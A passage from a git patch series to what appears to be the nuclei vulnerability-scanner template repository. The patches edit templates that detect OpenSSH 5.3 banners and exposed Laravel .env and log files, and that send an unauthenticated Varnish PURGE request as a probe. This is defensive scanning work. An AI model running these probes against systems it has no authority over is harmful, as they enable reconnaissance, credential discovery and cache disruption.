http://seclists.org/fulldisclosure/2016/Jul/51 +# https://security-tracker.debian.org/tracker/CVE-2016-6210 +# http://openwall.com/lists/oss-security/2016/08/01/2 + +network: + - host: + - "{{Hostname}}:22" + matchers: + - type: word + words: + - "SSH-2.0-OpenSSH_5.3" From f2a26c1ca4ea25fa36fa9bce3acd3368f121d849 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Sun, 11 Apr 2021 18:39:42 +0530 Subject: [PATCH 69/79] Update openssh5.3-detect.yaml --- network/openssh5.3-detect.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/network/openssh5.3-detect.yaml b/network/openssh5.3-detect.yaml index ac9f67fc5b..4f36183403 100644 --- a/network/openssh5.3-detect.yaml +++ b/network/openssh5.3-detect.yaml @@ -5,7 +5,6 @@ info: author: iamthefrogy severity: low tags: network, openssh - # OpenSSH 5.3 is vulnerable to username enumeraiton and DoS vulnerabilities with below 2 CVEs From 795fedc6027373edf56dee04fe305eb449f0a189 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Sun, 11 Apr 2021 18:46:48 +0530 Subject: [PATCH 70/79] minor updates --- network/openssh5.3-detect.yaml | 19 +++++++++---------- 1 file changed, 9 insertions(+), 10 deletions(-) diff --git a/network/openssh5.3-detect.yaml b/network/openssh5.3-detect.yaml index 4f36183403..74ca96c63b 100644 --- a/network/openssh5.3-detect.yaml +++ b/network/openssh5.3-detect.yaml @@ -1,22 +1,21 @@ -id: OpenSSH-5.3-detect +id: openssh-5.3-detect info: name: OpenSSH 5.3 Detection author: iamthefrogy severity: low - tags: network, openssh - - -# OpenSSH 5.3 is vulnerable to username enumeraiton and DoS vulnerabilities with below 2 CVEs -# -------------------------------------------------------------------------------------------- -# http://seclists.org/fulldisclosure/2016/Jul/51 -# https://security-tracker.debian.org/tracker/CVE-2016-6210 -# http://openwall.com/lists/oss-security/2016/08/01/2 + tags: network,openssh + description: OpenSSH 5.3 is vulnerable to username enumeraiton and DoS vulnerabilities. + reference: | + - http://seclists.org/fulldisclosure/2016/Jul/51 + - https://security-tracker.debian.org/tracker/CVE-2016-6210 + - http://openwall.com/lists/oss-security/2016/08/01/2 network: - host: + - "{{Hostname}}" - "{{Hostname}}:22" matchers: - type: word words: - - "SSH-2.0-OpenSSH_5.3" + - "SSH-2.0-OpenSSH_5.3" \ No newline at end of file From c6c93b4a4fea75f120af4027f25f13145c39db9d Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 11 Apr 2021 14:01:31 +0000 Subject: [PATCH 71/79] Auto Update README [Sun Apr 11 14:01:31 UTC 2021] :robot: --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index d048ef4341..b048feaf54 100644 --- a/README.md +++ b/README.md @@ -44,7 +44,7 @@ An overview of the nuclei template directory including number of templates assoc | default-logins | 21 | exposed-tokens | 33 | dns | 8 | | fuzzing | 7 | helpers | 6 | iot | 11 | -**95 directories, 926 files**. +**95 directories, 927 files**. From 352dd36c51bae1860db37d7c2b90c98c2c5fe43a Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Sun, 11 Apr 2021 19:55:27 +0530 Subject: [PATCH 72/79] Update laravel-telescope.yaml --- exposures/logs/laravel-telescope.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposures/logs/laravel-telescope.yaml b/exposures/logs/laravel-telescope.yaml index 01854df18c..1b07954008 100644 --- a/exposures/logs/laravel-telescope.yaml +++ b/exposures/logs/laravel-telescope.yaml @@ -6,7 +6,7 @@ info: description: Telescope provides insight into the requests coming into your application, exceptions, log entries, database queries, queued jobs, mail, notifications, cache operations, scheduled tasks, variable dumps, and more. reference: https://laravel.com/docs/8.x/telescope severity: medium - tags: laravel,disclosure + tags: laravel,disclosure,log requests: - method: GET From 31bfe36b60c75b4c66216a8847c2eb6b87a184ce Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 11 Apr 2021 14:26:06 +0000 Subject: [PATCH 73/79] Auto Update README [Sun Apr 11 14:26:06 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index b048feaf54..137e9d778b 100644 --- a/README.md +++ b/README.md @@ -39,12 +39,12 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | | cves | 270 | vulnerabilities | 121 | exposed-panels | 118 | -| takeovers | 67 | exposures | 70 | technologies | 60 | +| takeovers | 67 | exposures | 71 | technologies | 60 | | misconfiguration | 55 | workflows | 27 | miscellaneous | 20 | | default-logins | 21 | exposed-tokens | 33 | dns | 8 | | fuzzing | 7 | helpers | 6 | iot | 11 | -**95 directories, 927 files**. +**95 directories, 928 files**. From 1ceb80dfd37c62c73ecc50a16fc03e0ab0a4f30c Mon Sep 17 00:00:00 2001 From: Dieter Van der Stock Date: Sun, 11 Apr 2021 16:32:06 +0200 Subject: [PATCH 74/79] Set laravel log exposure severity to high. Add description and reference. --- exposures/logs/laravel-log-file.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/exposures/logs/laravel-log-file.yaml b/exposures/logs/laravel-log-file.yaml index 75b47eac0b..2b2334e881 100644 --- a/exposures/logs/laravel-log-file.yaml +++ b/exposures/logs/laravel-log-file.yaml @@ -3,7 +3,9 @@ id: laravel-log-file info: name: Laravel log file publicly accessible author: sheikhrishad & geeknik - severity: low + severity: high + description: The log file of this Laravel web app is publicly accessible. This might reveal details on the inner workings of the app, possibly even tokens, credentials or personal information. + reference: https://laravel.com/docs/master/logging tags: laravel,log,exposure requests: From 99cdbe8c5ebc1988afb07516204d3316cf56890a Mon Sep 17 00:00:00 2001 From: Dieter Van der Stock Date: Sun, 11 Apr 2021 16:35:07 +0200 Subject: [PATCH 75/79] Up severity on public .env file and add description and reference --- exposures/configs/laravel-env.yaml | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/exposures/configs/laravel-env.yaml b/exposures/configs/laravel-env.yaml index 7d775e8148..3611ef1763 100644 --- a/exposures/configs/laravel-env.yaml +++ b/exposures/configs/laravel-env.yaml @@ -1,9 +1,11 @@ id: laravel-env info: - name: Laravel .env file + name: Laravel .env file accessible author: pxmme1337 & dwisiswant0 & geeknik & emenalf - severity: medium + severity: critical + description: Laravel uses the .env file to store sensitive information like database credentials and tokens. It should not be publicly accessible. + reference: https://laravel.com/docs/master/configuration#environment-configuration tags: config,exposure requests: From cb58bffb8251adb1aebbcf7f1542357d7a220739 Mon Sep 17 00:00:00 2001 From: Dieter Van der Stock Date: Sun, 11 Apr 2021 16:35:27 +0200 Subject: [PATCH 76/79] Shorten description on laravel-log-file a bit --- exposures/logs/laravel-log-file.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposures/logs/laravel-log-file.yaml b/exposures/logs/laravel-log-file.yaml index 2b2334e881..7ec45fa9ac 100644 --- a/exposures/logs/laravel-log-file.yaml +++ b/exposures/logs/laravel-log-file.yaml @@ -4,7 +4,7 @@ info: name: Laravel log file publicly accessible author: sheikhrishad & geeknik severity: high - description: The log file of this Laravel web app is publicly accessible. This might reveal details on the inner workings of the app, possibly even tokens, credentials or personal information. + description: The log file of this Laravel web app might reveal details on the inner workings of the app, possibly even tokens, credentials or personal information. reference: https://laravel.com/docs/master/logging tags: laravel,log,exposure From bae3ee19e6006901085e01c0a5aeabe7fca937d6 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Sun, 11 Apr 2021 20:50:42 +0530 Subject: [PATCH 77/79] template update --- .../unautneicated-cache-purge.yaml | 27 +++++++++++++++++++ vulnerabilities/varnish-cache.yaml | 16 ----------- 2 files changed, 27 insertions(+), 16 deletions(-) create mode 100644 misconfiguration/unautneicated-cache-purge.yaml delete mode 100644 vulnerabilities/varnish-cache.yaml diff --git a/misconfiguration/unautneicated-cache-purge.yaml b/misconfiguration/unautneicated-cache-purge.yaml new file mode 100644 index 0000000000..1b6197e612 --- /dev/null +++ b/misconfiguration/unautneicated-cache-purge.yaml @@ -0,0 +1,27 @@ +id: unauthenticated-cache-purge +info: + name: Varnish Unauthenticated Cache Purge + author: 0xelkomy + severity: low + description: As per guideline oen should protect purges with ACLs from unauthorized hosts. + reference: https://book.varnish-software.com/4.0/chapters/Cache_Invalidation.html + hackerone: https://hackerone.com/reports/154278 + tags: varnish,misconfig,cache + +requests: + - method: PURGE + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '200 Purged' + - '"status": "ok"' + condition: or + + - type: status + status: + - 200 \ No newline at end of file diff --git a/vulnerabilities/varnish-cache.yaml b/vulnerabilities/varnish-cache.yaml deleted file mode 100644 index 2a83f05ffd..0000000000 --- a/vulnerabilities/varnish-cache.yaml +++ /dev/null @@ -1,16 +0,0 @@ -id: vanish-detect -info: - name: Vanish Cache Detection - author: 0xelkomy - severity: low -requests: - - raw: - - | - PURGE / HTTP/1.1 - - matchers: - - type: dsl - name: multi-req - dsl: - - 'contains(body_1, "200 Purged") == true' - req-condition: true From b0d7059c02a5e54c1c14361bbac0a3765b054840 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 11 Apr 2021 15:22:32 +0000 Subject: [PATCH 78/79] Auto Update README [Sun Apr 11 15:22:32 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 137e9d778b..3bc0dab6c8 100644 --- a/README.md +++ b/README.md @@ -40,11 +40,11 @@ An overview of the nuclei template directory including number of templates assoc | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | | cves | 270 | vulnerabilities | 121 | exposed-panels | 118 | | takeovers | 67 | exposures | 71 | technologies | 60 | -| misconfiguration | 55 | workflows | 27 | miscellaneous | 20 | +| misconfiguration | 56 | workflows | 27 | miscellaneous | 20 | | default-logins | 21 | exposed-tokens | 33 | dns | 8 | | fuzzing | 7 | helpers | 6 | iot | 11 | -**95 directories, 928 files**. +**95 directories, 929 files**. From 0d85374b645a8b5a810094ae513a5ce25461b19a Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Sun, 11 Apr 2021 21:13:24 +0530 Subject: [PATCH 79/79] Update unautneicated-cache-purge.yaml --- misconfiguration/unautneicated-cache-purge.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/misconfiguration/unautneicated-cache-purge.yaml b/misconfiguration/unautneicated-cache-purge.yaml index 1b6197e612..459ab72757 100644 --- a/misconfiguration/unautneicated-cache-purge.yaml +++ b/misconfiguration/unautneicated-cache-purge.yaml @@ -3,7 +3,7 @@ info: name: Varnish Unauthenticated Cache Purge author: 0xelkomy severity: low - description: As per guideline oen should protect purges with ACLs from unauthorized hosts. + description: As per guideline one should protect purges with ACLs from unauthorized hosts. reference: https://book.varnish-software.com/4.0/chapters/Cache_Invalidation.html hackerone: https://hackerone.com/reports/154278 tags: varnish,misconfig,cache